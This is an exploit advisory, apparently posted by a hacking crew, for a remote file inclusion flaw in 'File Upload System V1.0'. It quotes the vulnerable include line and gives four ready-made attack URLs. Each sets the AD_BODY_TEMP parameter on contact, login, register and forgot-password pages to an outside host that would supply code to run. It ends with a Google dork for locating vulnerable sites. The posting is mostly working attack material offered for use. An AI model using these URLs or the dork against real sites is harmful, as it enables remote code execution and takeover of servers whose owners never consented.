File Upload System V1.0 (AD_BODY_TEMP) multiple file include
============================ HItamputih Crew ====================
# hitamputih Advisory
# Discovered By : IbnuSina & jipank
#-----------------------------------------------------------
# Software: File Upload System V1.0
# Script Demo: http://demo.free-php-scripts.net/File_Upload
# Method: file inclusion
# Thanks To : akukasih,nyubi,irvian,BlueSpy,kurt_kabayan and all #hitamputih crew
[[Exploitz]]---------------------------------------------------------
?php include($AD_BODY_TEMP);?>
exploit :
http://target.com/[PATH]/contact.php?AD_BODY_TEMP=http://injekan.lu
http://target.com/[PATH]/login.php?AD_BODY_TEMP=http://injekan.lu
http://target.com/[PATH]/register.php?AD_BODY_TEMP=http://injekan.lu
http://target.com/[PATH]/forgot_pass.php?AD_BODY_TEMP=http://injekan.lu
gugel dork : intext:"Marsal Design Co."